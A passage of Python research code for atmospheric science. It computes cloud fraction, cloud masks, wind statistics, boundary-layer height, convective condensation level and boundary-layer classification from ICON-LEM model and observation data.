CB_PBL_out[ind] = CB_collective[ind] # assigning cloud base if it is below 2500 mt
return (CBarray, CTarray, NlayersArray, CB_PBL_out, CT_PBL_out, CB_collective, CT_collective)
#---------------------------------------------------------------------------------
# date : 28.01.2019
# author: Claudia Acquistapace
# goal: function that calculates cloud fraction over 30 minutes of time for the whole day for ICON-LEM
# input:
# QI_ICON_LEM, \
# QC_ICON_LEM,
# datetime_ICON,
# height_2_ICON_LEM,
# QiThreshold,
# QcThreshold
#
# output:
# mean_CF_liquid_ICON,
# mean_CF_ice_ICON,
# mean_CF_tot_ICON,
# datetime_out
#--------------------------------------------------------------------------------
def f_calculateCloudFractionICON(QI, QC, yy, mm, dd, time, height, QiThreshold, QcThreshold):
# calculation of cloud fraction for ICON_LEM
# creating a dataframe with for Qi and Qc with time and height using pandas dataframe
QI_ICON_DF = pd.DataFrame(QI, index=time, columns=height)
QC_ICON_DF = pd.DataFrame(QC, index=time, columns=height)
# defining mean cloud fraction matrices to contain average profile every hour for the supersite
mean_CF_liquid_ICON = np.zeros((48,150))
mean_CF_ice_ICON = np.zeros((48,150))
mean_CF_tot_ICON = np.zeros((48,150))
deltaT = datetime.timedelta(minutes=30)
indInt = 0
datetime_out = []
# --- loop on hours to calculate the mean hourly profile
for itime in range(0,48):
if indInt == 0:
HourInf = datetime.datetime(int(yy), int(mm), int(dd), 0, 0, 0)
else:
HourInf = HourInf + deltaT
HourSup = HourInf + deltaT
datetime_out.append(HourInf)
indInt = indInt + 1
Qi_sliced_t = QI_ICON_DF.loc[(QI_ICON_DF.index < HourSup) * (QI_ICON_DF.index > HourInf),:]
Qc_sliced_t = QC_ICON_DF.loc[(QC_ICON_DF.index < HourSup) * (QC_ICON_DF.index > HourInf),:]
# ---- loop on heights: for each height counting the number of elements
# larger than the threshold and
# calculating the cloud fraction as the ratio between this number and
# the number of elements counted in the hour
#print len(DF_qi_hour[DF_qi_hour.iloc[:,0] > QiThreshold])
#print len(DF_qi_hour.iloc[:,0])
for iheight in range(len(height)-1):
#for iheight in range(2):
# extracting array
DF_qi_arr = Qi_sliced_t.loc[:,height[iheight]]
DF_qc_arr = Qc_sliced_t.loc[:,height[iheight]]
NelemTot = len(DF_qi_arr)
# posing conditions on cloud fraction for liquid only
Cond_iceClouds=np.isfinite(DF_qi_arr[DF_qi_arr > QiThreshold] * DF_qc_arr[DF_qc_arr < QcThreshold])
Cond_iceClouds.apply(int)
Num_iceCloud=Cond_iceClouds.sum()
Cond_LiquidClouds=np.isfinite(DF_qc_arr[DF_qi_arr < QiThreshold] * DF_qc_arr[DF_qc_arr > QcThreshold])
Cond_LiquidClouds.apply(int)
Num_liquidCloud=Cond_LiquidClouds.sum()
#print(Num_liquidCloud)
#print(Num_iceCloud)
if float(NelemTot) == 0:
print('Houston, we have a problem!')
else:
mean_CF_ice_ICON[itime,iheight]=float(Num_iceCloud)/float(NelemTot)
mean_CF_liquid_ICON[itime,iheight]=float(Num_liquidCloud)/float(NelemTot)
mean_CF_tot_ICON[itime,iheight]=float(Num_iceCloud+Num_liquidCloud)/float(NelemTot)
# defining dictionary containing data to have as output
dict_CF = {}
# filling dictionaries with data
dict_CF = {
'TotalCloudFraction':mean_CF_tot_ICON,
'LiquidCloudFraction':mean_CF_liquid_ICON,
'IceCloudFraction':mean_CF_ice_ICON,
'height':height,
'time':datetime_out,
}
return(dict_CF)
def f_plotTest(matrix, time, height, figname):
pathFig = '/work/cacquist/HDCP2_S2/statistics/figs/patch003/figures_JAMES/'
fig, ax = plt.subplots(figsize=(10, 5))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
matplotlib.rc('xtick', labelsize=10) # sets dimension of ticks in the plots
matplotlib.rc('ytick', labelsize=10) # sets dimension of ticks in the plots
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
cax = ax.pcolormesh(time, height, matrix, vmin=0, vmax=3,
cmap=plt.cm.get_cmap("GnBu", 4))
ax.set_ylim(0., 15000) # limits of the y-axes
# ax.set_xlim(timeStart, timeEnd) # limits of the x-axes
ax.set_title("cloud mask model", fontsize=10)
ax.set_xlabel("time [hh:mm]", fontsize=10)
ax.set_ylabel("height [m]", fontsize=10)
cbar = fig.colorbar(cax, ticks=[0, 1, 2, 3], orientation='vertical', aspect=10)
cbar.ticks = ([0, 1, 2, 3])
cbar.ax.set_yticklabels(['no cloud', 'liquid', 'ice', 'mixed phase'])
cbar.set_label(label="cloud type", size=10)
cbar.ax.tick_params(labelsize=10)
plt.tight_layout()
plt.savefig(pathFig + figname + '_cloudMask.png')
return ()
""" function to derive wind speed and direction
#---------------------------------------------------------------------------------
date : 17.12.2018
author: Claudia Acquistapace (cacquist@meteo.uni-koeln.de)
goal: derive wind speed and direction in form of list and matrices
input:
- datetime_ICON: time array
- height_ICON: height array
- u_ms: zonal wind
- v_ms: meridional wind
output:
- ws: list of wind speed
- wd: list of wind directions
- wind_abs: matrix of wind speed
- wind_dir_trig_from_degrees: matrix of wind direction in degrees indicating
the direction from where wind is coming
"""
#--------------------------------------------------------------------------------
def f_calcWindSpeed_Dir(datetime_ICON, height_ICON, u_ms, v_ms):
import math
wind_abs = np.sqrt(u_ms**2 + v_ms**2)
wind_dir_trig_to = np.zeros((len(datetime_ICON),len(height_ICON)))
wind_dir_trig_to_degrees = np.zeros((len(datetime_ICON),len(height_ICON)))
wind_dir_trig_from_degrees = np.zeros((len(datetime_ICON),len(height_ICON)))
wind_dir_cardinal = np.zeros((len(datetime_ICON),len(height_ICON)))
ws = []
wd = []
for itime in range(len(datetime_ICON)):
for iHeight in range(len(height_ICON)):
# wind dir in unit circle coordinates (wind_dir_trig_to), which increase counterclockwise and have a zero on the x-axis
wind_dir_trig_to[itime, iHeight] = math.atan2(v_ms[itime, iHeight],u_ms[itime, iHeight])
# wind dir in degrees (wind_dir_trig_to_degrees) dir where wind goes
wind_dir_trig_to_degrees[itime, iHeight] = wind_dir_trig_to[itime, iHeight] * 180/math.pi ## -111.6 degrees
# wind dir in degrees (wind_dir_trig_to_degrees) dir from where wind comes
wind_dir_trig_from_degrees[itime, iHeight] = wind_dir_trig_to_degrees[itime, iHeight] + 180 ## 68.38 degrees
# wind dir in cardinal coordinates from the wind dir in degrees (wind_dir_trig_to_degrees) dir from where wind comes
wind_dir_cardinal[itime, iHeight] = 90 - wind_dir_trig_from_degrees[itime, iHeight]
if np.isfinite(wind_dir_trig_from_degrees[itime, iHeight]) and \
np.isfinite(wind_abs[itime, iHeight]) and \
(wind_abs[itime, iHeight] != 0.):
wd.append(wind_dir_trig_from_degrees[itime, iHeight])
ws.append(wind_abs[itime, iHeight])
WindDictionary={'windDirection':ws,
'windSpeed':wd,
}
return(WindDictionary)
# function to plot color time heigth maps from a dictionary of initial data
#---------------------------------------------------------------------------------
# date : 14.12.2018
# author: Claudia Acquistapace (cacquist@meteo.uni-koeln.de)
# goal: function to derive pdfs of vertical and horizontal wind below cloud base
# check for vertical wind values observed below cloud base. for every time stamp.
# methodology: for observations:
# if there is cloud base in observations, store vertical wind values recorded in the 300m below cloud base.
# if there is no cloud, store vertical wind values in the 5 bins below mean estimated cloud base.
# input : vertical wind, horizontal wind, time, height
# output: verticalWindPDF_cloud, verticalWindPDF_nocloud, horizontalWindPDF_cloud, horizontalWindPDF_nocloud
#--------------------------------------------------------------------------------
def f_pdfsBelowCloudBase(w_ICON, Hwind, height, datetime_ICON, datetimeHourArr, height_ICON, mean_CB_arr_OBS, CB_array_OBS, timeStart, timeEnd):
verticalWindPDF_cloud = []
horizontalWindPDF_cloud = []
verticalWindPDF_nocloud = []
horizontalWindPDF_nocloud = []
distHeight = 400.
vertWind_ICON_DF = pd.DataFrame(w_ICON, index=datetime_ICON, columns=height)
HorWind_ICON_DF = pd.DataFrame(Hwind, index=datetime_ICON, columns=height_ICON)
limTimeInf = timeStart
limTimeSup = timeEnd
# establishing height below which to check for wind
for indTime in range(len(datetime_ICON)):
if (datetime_ICON[indTime] > limTimeInf) * (datetime_ICON[indTime] < limTimeSup):
# case of no clouds, read mean cloud base height in the hour and extract height
if np.isfinite(CB_array_OBS[indTime]) == False:
findHourInd = f_closest(np.asarray(datetimeHourArr), datetime_ICON[indTime])
CBHeight = mean_CB_arr_OBS[findHourInd]
mask_h_vertWind = (vertWind_ICON_DF.columns < CBHeight) * (vertWind_ICON_DF.columns > CBHeight-distHeight)
valuesWwind = vertWind_ICON_DF.values[indTime, mask_h_vertWind].flatten()
mask_h_horwind = (HorWind_ICON_DF.columns < CBHeight) * (HorWind_ICON_DF.columns > CBHeight-distHeight)
valuesHwind = HorWind_ICON_DF.values[indTime, mask_h_horwind].flatten()
for indValw in range(len(valuesWwind)):
verticalWindPDF_nocloud.append(valuesWwind[indValw])
for indValh in range(len(valuesHwind)):
horizontalWindPDF_nocloud.append(valuesHwind[indValh])
# case of clouds: read cloud base height and extract bins below.
else:
CBHeight = CB_array_OBS[indTime]
mask_h_vertWind = (vertWind_ICON_DF.columns < CBHeight) * (vertWind_ICON_DF.columns > CBHeight-distHeight)
valuesWwind = vertWind_ICON_DF.values[indTime, mask_h_vertWind].flatten()
mask_h_horwind = (HorWind_ICON_DF.columns < CBHeight) * (HorWind_ICON_DF.columns > CBHeight-distHeight)
valuesHwind = HorWind_ICON_DF.values[indTime, mask_h_horwind].flatten()
for indValw in range(len(valuesWwind)):
verticalWindPDF_cloud.append(valuesWwind[indValw])
for indValh in range(len(valuesHwind)):
horizontalWindPDF_cloud.append(valuesHwind[indValh])
return(verticalWindPDF_cloud, verticalWindPDF_nocloud, horizontalWindPDF_cloud, horizontalWindPDF_nocloud)
def f_calcPblHeightRN(thetaV,Uwind,Vwind,height,time,device):
"""
PBL height calculation function
--------------------------------------------------------------------------------
date created : 15.01.2018
date modifed : 05.12.2019
author: Claudia Acquistapace
goal: calculate the boundary layer height following the richardson number
derivation according to Seidel Et al, 2010
#---------------------------------------------------------------------------------
"""
g = 9.8 # gravity constant
Rithreshold = 0.25 # Threshold values for Ri
#Rithreshold2 = 0.2
dimTime = len(time)
dimHeight = len(height)
if (device == 'mod'):
zs = height[149] # height of the surface reference
if (device == 'obs'):
zs = height[0]
RiMatrix = np.zeros((dimTime, dimHeight)) # Richardson number matrix
PBLheightArr = []
RiCol = np.zeros((dimHeight))
# calculating richardson number matrix
for iTime in range(dimTime):
thetaS = thetaV[iTime,149]
for iHeight in range(dimHeight):
den = ((Uwind[iTime,iHeight])**2 + (Vwind[iTime,iHeight])**2)
if den == 0.:
RiMatrix[iTime,iHeight] = 0.
else:
RiMatrix[iTime,iHeight] = (1/den) * (g/thetaS) * (thetaV[iTime,iHeight]-thetaS)*(height[iHeight]-zs)
# find index in height where Ri > Rithreshold
for iTime in range(dimTime):
RiCol=RiMatrix[iTime,:]
#print(RiCol)
#print(np.where(RiCol > Rithreshold2)[0][:])
#print(len(np.where(RiCol > Rithreshold)[0][:]))
if len(np.where(RiCol > Rithreshold)[0][:]) != 0:
PBLheightArr.append(height[np.where(RiCol > Rithreshold)[0][-1]] - height[dimHeight-1])
else:
PBLheightArr.append(0)
return PBLheightArr
def f_calcPblHeightTW(stdWmatrix,sigmaThreshold,height2,time, device):
"""
PBL height calculation function based on threshold on std w method
--------------------------------------------------------------------------------
date created : 05.12.2019
author: Claudia Acquistapace
goal: calculate the boundary layer height following the method of a threshold on sigma w
as indicated in Schween et al., 2014. The algorithm takes the maximum of the heights below 2000m
at which the sigma values is larger than 0.4. 2000m is a conservative value
threshold obtained from the paper from Schween et al., 2014 on MLH at JOYCE
#---------------------------------------------------------------------------------
"""
dimTime = len(time)
PBLheightTW = np.zeros((dimTime))
PBLheightTW.fill(np.nan)
#std_matrix[:,height < height[142]] = 0.
for ind in range(len(time)):
if device == 'mod':
column = stdWmatrix[ind,:]
aboveThr = column > sigmaThreshold
#selecting heights below 2000
Hsel = height2[aboveThr]
Hbelow = Hsel[Hsel < 2000.]
if np.count_nonzero((Hbelow)) != 0:
PBLheightTW[ind] = np.nanmax(Hbelow)
return(PBLheightTW)
# function to calculate the convective condensation level height and temperature
#---------------------------------------------------------------------------------
# date : 17.05.2018
# author: Claudia Acquistapace
# goal: function that calculates the convective condensation level (CCL) height and temperature.
# for the definition of the CCL check this: https://en.wikipedia.org/wiki/Convective_condensation_level
# input:
# - T field (time, height)
# - RH field (time, height) ( es: 75,0)
# - P field (time, height)
# - height [in m]
# - datetime [in datetime format]
# output:
# - Z_ccl (time) time serie of the height of the CCL
# - T_CCl (time) time serie of the temperature a parcel should have to reach the height for condensation
# - T_dew point (time, height ) dew point temperature field for every time, height
# method: the function first calculates the dew point temperature field and the dew point at the surface for every time. Then, we derive the saturation mixing ratio at the surface for T=Td. Then, we calculate the mixing ratio field
#--------------------------------------------------------------------------------
def f_CCL(T_ICON, P_ICON, RH_ICON, height_ICON, datetime_ICON, Hsurf):
# temperature has to be provided in K
# RH in % ( 70.14)
# P In Kpa
dimHeight = len(height_ICON)
# defining constants
cost_rvl = np.power(5423,-1.) #K
E0 = 0.611 # Kpa
T0 = 273. # K
Rv = 461 # J K^-1 Kg^-1
epsilon = 0.622
Ad_rate = -9.8 # K/Km
# ---- substituting RH = 0. to RH = nan to avoid log(0) cases
RH_ICON [ RH_ICON == 0.] = np.nan
T_ICON [ T_ICON == 0.] = np.nan
# ---- calculating due point temperature profile for each time (The dew point is \
# the temperature to which air must be cooled to become saturated with water vapor. )
Td = np.power(np.power(T_ICON,-1.)-cost_rvl*np.log(RH_ICON/100.),-1.)
# ---- calculating mixing ratio at the surface for T dew point
Td_surf = Td[:, dimHeight-1]
P_surf = P_ICON[:,dimHeight-1]
RH_surf = RH_ICON[:,dimHeight-1]
for indtime in range(len(datetime_ICON)):
if (~np.isfinite(RH_surf[indtime])):
RH_surf[indtime] = RH_ICON[indtime,dimHeight-2]
if (~np.isfinite(Td_surf[indtime])):
Td_surf[indtime] = Td[indtime,dimHeight-2]
# ---- calculating the saturation mixing ratio for td at the surface (assuming RH =100%)
M0 = epsilon*E0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))) / (P_surf - E0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))))
# ---- calculating mixing ratio profile for each P,T, RH using profile RH
m = (RH_ICON/100.)*epsilon*E0*np.exp((1./Rv)*(T0**(-1.)-T_ICON**(-1.))) / (P_ICON - (RH_ICON/100.)*E0*np.exp((1./Rv)*(T0**(-1.)-T_ICON**(-1.))))
#fig, ax = plt.subplots(figsize=(12,5))
#plt.plot(m[5000,:],height_ICON)
#plt.plot(np.repeat(M0[5000],len(height_ICON)), height_ICON)
#plt.ylim(0,6000)
# ---- calculating indeces of height of Z_ccl and Z_CCL height
ind_CCL = []
dimHeight=len(height_ICON)
#print(dimHeight)
for indTime in range(len(datetime_ICON)):
for indHeight in range(dimHeight-2,1,-1):
#print(height_ICON[indHeight])
if (m[indTime,indHeight] < M0[indTime] and m[indTime,indHeight-1] > M0[indTime] ):
ind_CCL.append(indHeight)
break
if indHeight == 1:
ind_CCL.append(dimHeight-1)
print(len(ind_CCL))
z_ccl = height_ICON[ind_CCL]
# ---- finding z(CCL) using the dry adiabatic lapse rate
T_ground_CCL = []
for indTime in range(len(ind_CCL)):
T_top = T_ICON[indTime, ind_CCL[indTime]]
T_ground_CCL.append(T_top - Ad_rate* z_ccl[indTime]*10.**(-3))
dict_out={'z_ccl':z_ccl,
'T_ccl':T_ground_CCL,
'Td':Td
}
return(dict_out)
def f_CCL_new(T, P, RH, height, time, date):
"""
function to calculate convective condensation level (CCL). For more info on definitions of this level, read pp.250
of Petty : A first course in atmospheric thermodynamics
input: T: temperature , to be provided in K
relative humidity, in % (es: 70.14)
pressure, in Kpa
device, string for "model" or "obs"
procedure:
step 1: calculate dew point T
step 2: calculate saturation mixing ratio m0 at t=Td, P=Psurf
step 3: calculate, for every value of P, Td(m=m0, P)
step 4: check, for every level of P, if there's a level i of P for which T(P)i-1 < Td(m0,P)i < T(P)i+1.
If the level is found, assign T_star = T(P)i and Z_ccl as the height corresponding to that pressure height.
step 5: calculate Tc using adiabatic lapse rate to come back at the height of the surface.
output: T_ccl, z_ccl
"""
#pathFig = '/work/cacquist/HDCP2_S2/statistics/figs/' + patch + '/figures_JAMES/debugging/'
print('calculating CCL height and T_CCL')
# defining constants
cost_rvl = np.power(5423, -1.) # K
E0 = 0.611 # Kpa
T0 = 273. # K
Rv = 461 # J K^-1 Kg^-1
L = 5.6 * 10 ** 6 # J/Kg
epsilon = 0.622
Ad_rate = -9.8 # K/Km
# assigning dimensions:
dimHeight = len(height)
dimTime = len(time)
# step 1: calculating due point temperature profile for each time (The dew point is \
# the temperature to which air must be cooled to become saturated with water vapor. )
# substituting RH = 0. to RH = nan to avoid log(0) cases
RH[RH == 0.] = np.nan
T[T == 0.] = np.nan
# calculating Td
Td = np.power(np.power(T, -1.) - cost_rvl * np.log(RH / 100.), -1.)
# step 2: calculating mixing ratio at the surface for T = Td and P=Psurf
# finding index of height corresponding to lowest level in height
indHmin = np.nanargmin((height))
# reading values of P, T, RH at the corresponding height
Td_surf = Td[:, indHmin]
P_surf = P[:, indHmin]
RH_surf = RH[:, indHmin]
m0 = epsilon * E0 * np.exp((1. / Rv) * (T0 ** (-1.) - Td_surf ** (-1.))) / (
P_surf - E0 * np.exp((1. / Rv) * (T0 ** (-1.) - Td_surf ** (-1.))))
#print(Td_surf, P_surf, RH_surf, m0)
# step 3: calculating Td(m=m0, P) for every P value
z_ccl = np.zeros((dimTime))
T_cclTop = np.zeros((dimTime))
z_ccl.fill(np.nan)
# indPlotCount = 0
for indTime in range(dimTime):
Tdm0_profile = np.zeros((dimHeight))
Tdm0_profile.fill(np.nan)
indCCLprofile = []
Tm0_surface = 1 / ((1 / T0) - ((1 / L) * Rv * np.log((m0 * P[:, indHmin]) / (E0 * epsilon))))
for indHeight in range(dimHeight - 1):
Tdm0_profile[indHeight] = 1 / (
(1 / T0) - ((1 / L) * Rv * np.log((m0[indTime] * P[indTime, indHeight]) / (E0 * epsilon))))
# print(T[indTime, indHmin])
if (T[indTime, indHeight] < Tdm0_profile[indHeight]) and (
T[indTime, indHeight + 1] > Tdm0_profile[indHeight]):
indCCLprofile.append(indHeight)
# print(Tdm0_profile[indHmin])
# print(T[indTime, indHmin])
#print(indCCLprofile)
##fig, ax = plt.subplots(figsize=(12, 5))
# plt.plot(Tdm0_profile, height, label='TDm0')
# plt.plot(T[indTime, :], height, label='T')
# plt.legend()
# plt.plot(time, z_ccl3)
# plt.plot(np.repeat(M0[5000],len(height)), height)
# plt.ylim(0, 6000)
# plt.savefig(pathFig + str(indPlotCount) + 'Tm0_profile_Check.png', format='png')
# indPlotCount = indPlotCount +1
# print(len(indCCLprofile))
if len(indCCLprofile) == 0:
z_ccl[indTime] = np.nan
T_cclTop[indTime] = np.nan
else:
z_ccl[indTime] = np.nanmin(height[indCCLprofile])
T_cclTop[indTime] = np.nanmin(T[indTime, np.nanargmin(height[indCCLprofile])])
# fig, ax = plt.subplots(figsize=(12,5))
# plt.plot(time, z_ccl)
# plt.ylim(0,6000)
# plt.savefig(pathFig+date+'_z_ccl_mod.png', format='png')
print(z_ccl)
# ---- finding z(CCL) using the dry adiabatic lapse rate
T_ground_CCL = np.zeros((dimTime))
for indTime in range(dimTime):
T_ground_CCL[indTime] = (T_cclTop[indTime] - Ad_rate * z_ccl[indTime] * 10. ** (-3))
# providing output as standardized xarray output format
#DatasetOut = xr.Dataset(
# data_vars={'z_ccl' : (('time'), z_ccl),
# 't_ccltop': (('time'), T_cclTop),
# 't_ccl' : (('time'), T_ground_CCL),
# 'T_dew' : (('time', 'height'), Td)},
# coords={'time' : time,
# 'height': height})
#return (DatasetOut)
DatasetOut = {'time':time,
'height':height,
'z_ccl':z_ccl,
'T_ground_ccl':T_ground_CCL,
'T_top_ccl':T_cclTop,
'T_dew':Td}
return (DatasetOut)
# moving variance calculation function
#---------------------------------------------------------------------------------
# date : 17.01.2018
# author: Claudia Acquistapace
# goal: function that calculates the moving average of an array of values over a given window given as imput
#--------------------------------------------------------------------------------
def runningMeanVariance(x, N):
return np.power(pd.rolling_std(x, N),2)
# variance of vertical velocity calculation
#---------------------------------------------------------------------------------
# date : 17.01.2018
# author: Claudia Acquistapace
# goal: function that calculates the variance of the vertical velocity matrix
# input:
# - matrix of vertical velocity
# - time array
# - height array
# - time window for the running mean (30 min for comparing to obs)
#--------------------------------------------------------------------------------
def f_calcWvariance(Wwind,time,height,window, res):
"""
OBSOLETE FUNCTION NOT USED ANYMORE
author: claudia acquistapace
date: 05.12.2019
goal: calculation of variance of vertical velocity. The function performs the
calculation of the standard deviation of vertical velocity as in the paper
from Schween et al., 2014., AMT, doi:10.5194/amt-7-3685-2014
input:
- Wwind: vertical velocity matrix (time, height)
- time: time array
- height: height array
- window: time window over which to calculate the standard deviation
- res: resolution at which calculate the standard deviation (in the
paper it is 5 min)
"""
dimTime = len(time)
dimHeight = len(height)
variance = np.zeros((dimTime,dimHeight))
for iheight in range(dimHeight):
# reading array of w values at a given height
Warray = Wwind[:,iheight]
s = pd.Series(Warray)
# calculating running mean variance over the selected array
# variance[:,iheight] = runningMeanVariance(Warray,window)\
#variance[:,iheight] = np.power(pd.rolling_std(Warray, window),2)
variance[:,iheight] = np.power(s.rolling(window).std(),2)
return variance
# skewness of vertical velocity calculation
#---------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
def f_runningMeanSkewnessVarianceStd_W(time, timeWindowSk, runningWindow, height, vertWind):
"""
author: Claudia Acquistapace
date created : 17.01.2018
date modified: 05.12.2019
goal : calculate running mean skewness and standard deviation of vertical velocity over a time window
given. The skewness is calculated from the data of the surroundings +- timewindow/2 min
The mean skewness is calculated on a resolution of timeWindowSk.
Processing of the data follows what indicated in Schween et al., 2014, AMT
DOI: 10.5194/amt-703685-2014
input parameters:
- time: time array
- timeWindowSk: time resolution on which to calculate the skewness (5 min in the paper)
- runningWindow: time window on which to calculate the running mean
- height: height array
- vertWind: matrix of w velocity (time, height)
output:
- skewness_w matrix (time, height)
"""
dimTime = len(time)
dimHeight = len(height)
SKmatrix = np.zeros((dimTime, dimHeight))
stdWmatrix = np.zeros((dimTime,dimHeight))
varianceW = np.zeros((dimTime,dimHeight))
SKmatrix.fill(np.nan)
stdWmatrix.fill(np.nan)
varianceW.fill(np.nan)
for iTime in range(0, dimTime-1, timeWindowSk):
# condition to skip first and last half interval of time stamps not surrounded
# by values
if (iTime > runningWindow/2) & (iTime < dimTime-1-runningWindow/2):
# generating indeces to read corresponding elements in the matrix
timeIndeces = np.arange(iTime-runningWindow/2, iTime+runningWindow/2, dtype=np.int16)
#print(iTime)
for iHeight in range(dimHeight):
meanW = np.mean(vertWind[timeIndeces, iHeight]) # mean of the wind array
variance = np.var(vertWind[timeIndeces, iHeight]) # variance of the wind array
wprime = np.subtract(vertWind[timeIndeces, iHeight],np.tile(meanW,len(timeIndeces)))
num = np.mean(np.power(wprime,3))
den = variance**(3./2.)
stdWmatrix[iTime:iTime+timeWindowSk-1, iHeight] = np.sqrt(variance)
SKmatrix[iTime:iTime+timeWindowSk-1, iHeight] = num/den
varianceW[iTime:iTime+timeWindowSk-1, iHeight] = variance
return (varianceW, stdWmatrix, SKmatrix)
# cloud mask for ice/liquid/mixed phase clouds
#---------------------------------------------------------------------------------
# date : 19.01.2018
# author: Claudia Acquistapace
# goal: function that calculates cloud mask for the day
# input:
# -Qc: cloud liquid content
# -Qi: ice liquid content
# -QcThreshold: Threshold value for detection of Qc
# -QiThreshold: Threshold value for detection of Qi
# output:
# -cloudmask(dimTime,dimheight) containing: 1=liquid clouds, 2=ice clouds, 3=mixed phase clouds
#--------------------------------------------------------------------------------
def f_cloudmask(time,height,Qc,Qi,QiThreshold,QcThreshold):
dimTime=len(time)
dimHeight=len(height)
cloudMask = np.zeros((dimTime, dimHeight))
# = 0 : no clouds
# = 1 : liquid clouds
# = 2 : ice clouds
# = 3 : mixed phase clouds
for iTime in range(dimTime):
for iHeight in range(dimHeight):
# Ice and not liquid
if (Qi[iTime, iHeight] > QiThreshold) and (Qc[iTime, iHeight] < QcThreshold):
cloudMask[iTime, iHeight] = 2. # ice clouds
# liquid and not ice
if (Qi[iTime, iHeight] < QiThreshold) and (Qc[iTime, iHeight] > QcThreshold):
cloudMask[iTime, iHeight] = 1. # liquid clouds
# liquid and ice
if (Qi[iTime, iHeight] >= QiThreshold) and (Qc[iTime, iHeight] >= QcThreshold):
cloudMask[iTime, iHeight] = 3. # mixed phase clouds
return cloudMask
# PBL cloud classification
#---------------------------------------------------------------------------------
# date : 25.01.2018
# author: Claudia Acquistapace
# goal: function that derives PBL classification
# input:
# -time: time array
# -height: height array
# -gradWindThr: threshold to detect wind shear regions
# -SigmaWThres: Threshold to detect turbulence
# -ylim: array of heights up to which classification is calculated
# -cloudMask: cloud mask indicating cloud presence
# -varianceMatrix: matrix containing variance of vertical velocity to detect turbulence
# -SKmatrix: matrix containing skewness of vertical velocity
# -StabilityArr: array of time dimension indicating stability of the PBL close to the surface
# -connection2Surface: array of time dimension indicating that turbulence is connected to the surface or not
# -gradWindSpeed: matrix (dimHeight,dimTime) containing the intensity of the shear of the horizontal wind
# -cloudBaseHeightArr: array of time dimension containing cloud base heights
# output:
# -PBLclass(dimTime,dimheight) containing: 1=in cloud, 2=non turb, 3=cloud driven, 4=convective, 5=intermittent, 6=wind shear
#--------------------------------------------------------------------------------
def f_PBLClass(time,height,gradWindThr,SigmaWThres,ylim, cloudMask, varianceWmatrix, SKmatrix, stabilityArr, connection2Surface, gradWindspeed, cloudBaseHeightArr):
# time, \
# height2, \
# gradWindThr, \
# SigmaWThres, \
# ylim, \
# cloudMask, \
# varianceWmatrix, \
# SKmatrix, \
# stabilityArr, \
# connection2Surface, \
# shear_ICON, \
# CB_array_ICON)
dimTime = len(time)
dimHeight = len(height)
PBLclass = np.zeros((dimTime, dimHeight)) # defining output matrix
shear = gradWindspeed#.transpose() # transposing gradWindspeed to conform to other matrices
# defining flag matrices and filling them with nan values. Each flag corresponds to a check to be performed for the classification. Checks are for: cloud/turbulence/cloud driven/unstable at surface/wind shear/surface driven
flagCloud = np.zeros((dimTime, dimHeight))
flagCloud.fill(np.nan)
flagTurb = np.zeros((dimTime, dimHeight))
flagTurb.fill(np.nan)
flagcloudDriven = np.zeros((dimTime, dimHeight))
flagcloudDriven.fill(np.nan)
flagInstability = np.zeros((dimTime, dimHeight))
flagInstability.fill(np.nan)
flagConnection = np.zeros((dimTime, dimHeight))
flagConnection.fill(np.nan)
flagSurfaceDriven = np.zeros((dimTime, dimHeight))
flagSurfaceDriven.fill(np.nan)
flagWindShear = np.zeros((dimTime, dimHeight))
flagWindShear.fill(np.nan)
# loop on time and height to assign flags to each pixel:
for iTime in range(dimTime):
for iHeight in range(dimHeight):
# quitting loop on heights if height is greater than ylim.
if height[iHeight] > ylim[iTime]:
iHeight = dimHeight-1
#------------------------------------------------------------
# check if cloud
#------------------------------------------------------------
if (cloudMask[iTime, iHeight] != 0):
flagCloud[iTime, iHeight] = 1
else:
flagCloud[iTime, iHeight] = 0
#------------------------------------------------------------
# check if not in cloud and not turbulent
#------------------------------------------------------------
if (varianceWmatrix[iTime,iHeight] >= SigmaWThres):
flagTurb[iTime, iHeight] = 1
else:
flagTurb[iTime, iHeight] = 0
#------------------------------------------------------------
# check if cloud driven ( conditions to pose: 1) below cloud base , 2) sigma > sthr, 3) connected to the cloud
#------------------------------------------------------------
if np.count_nonzero(cloudMask[iTime,:]) == 0:
flagcloudDriven[iTime, iHeight] = 0
else:
indCB=f_closest(height, cloudBaseHeightArr[iTime]) # finding index of cloud base
if iHeight <= indCB:
flagcloudDriven[iTime, iHeight] = 0
else:
flagConnect = []
# check if pixels between cloud base and height[iheight] fullfill conditions for being cloud driven
for ind in range(indCB, iHeight):
if (varianceWmatrix[iTime,ind] > SigmaWThres) & (SKmatrix[iTime,ind] < 0.):
flagConnect.append(1)
if (varianceWmatrix[iTime,iHeight] > SigmaWThres) & (SKmatrix[iTime,iHeight] < 0.) & (len(flagConnect) == iHeight - indCB):
flagcloudDriven[iTime, iHeight] = 1
else:
flagcloudDriven[iTime, iHeight] = 0
#------------------------------------------------------------
# check if unstable to the surface
#------------------------------------------------------------
if (stabilityArr[iTime] == 0):
flagInstability[iTime, iHeight] = 1
else:
flagInstability[iTime, iHeight] = 0
#------------------------------------------------------------
# check if wind shear is present
#------------------------------------------------------------
if (shear[iTime,iHeight] < gradWindThr):
flagWindShear[iTime,iHeight] = 0
else:
flagWindShear[iTime,iHeight] = 1
#------------------------------------------------------------
# check if turbulence is surface driven
#------------------------------------------------------------
if (connection2Surface[iTime] == 0):
flagSurfaceDriven[iTime,iHeight] = 0
else:
# find min height where variance is bigger than the threshold
indArray = np.where(varianceWmatrix[iTime,:] > SigmaWThres)[0]
if len(indArray) > 0:
indHmin = np.max(indArray)
if indHmin > 200:
flagSurfaceDriven[iTime,iHeight] = 0
else:
counter = indHmin
while varianceWmatrix[iTime,counter] > SigmaWThres:
counter = counter - 1
flagSurfaceDriven[iTime,iHeight] = 1
else:
flagSurfaceDriven[iTime,iHeight] = 0
# defining classification by posing conditions as indicated in Manninen et al, 2018, JGR
for iTime in range(dimTime):
for iHeight in range(dimHeight):
# quitting loop on heights if height is greater than ylim.
if height[iHeight] > ylim[iTime]:
iHeight = dimHeight-1
# defining in cloud bins
if (flagCloud[iTime, iHeight] == 1):
PBLclass[iTime, iHeight] = 1
# defining non turbulent bins
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 0):
